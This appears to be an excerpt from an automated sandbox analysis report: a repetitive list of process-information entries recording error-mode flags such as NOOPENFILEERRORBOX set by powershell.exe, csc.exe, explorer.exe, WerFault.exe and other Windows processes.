              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
